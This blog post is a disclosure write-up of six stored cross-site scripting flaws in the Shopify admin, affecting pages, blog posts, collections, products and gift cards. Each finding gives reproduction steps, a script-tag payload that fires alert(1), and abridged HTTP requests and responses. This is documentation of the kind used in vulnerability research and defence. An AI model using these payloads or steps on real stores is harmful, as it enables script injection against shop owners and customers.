Sunday, 12 March 2023

Full Disclosure - Shopify Application Stored Cross Site Script

 

Application

  • Shopify web application


Information

  • Input not validated
  • Stored Cross Site Scripting flaw


Exploit


XSS #1

1. Browse to Online Store

2. Select Pages ->  Add Page

3. Set Title -> Title_Name

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix HTML encoding of tags


&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"page":{"bodyHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name"

[...]


XSS #2

1. Browse to Online Store

2. Select Blog Posts -> Add Blog Post

3. Set Title -> Blog_Title

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix HTML encoding of tags


&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2"

[...]


XSS #3

1. Browse to Products 

2. Select Collections -> Create Collection

3. Set Title -> Collection_Title

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix HTML encoding of tags


&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateCollection&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"collection":{"title":"Collection_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"

[...]


XSS #4

1. Browse to Products 

2. Select Inventory-> View Products

3. Select Product -> Title -> Product_Title

4. Set Description  -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix HTML encoding of tags


&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>","workflow":"product-details-update"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>"

[...]


XSS #5

1. Browse to Products 

2. Add Product -> Title -> Product_Title 

3. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

4. Select Show HTML 

5. Fix HTML encoding of tags


&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"product":{"descriptionHtml":"<p>&nbsp;</p>...\"><script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n</code></pre>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"title":"Gift_Title","><script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n</code></pre>",

[...]


XSS #6

1. Browse to Products 

2. Select Gift Cards

3. Add Gift Card Products -> Gift_Title

4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix HTML encoding of tags


&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]


[...]

"product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"

[...]


at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

Description - It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place. Stor...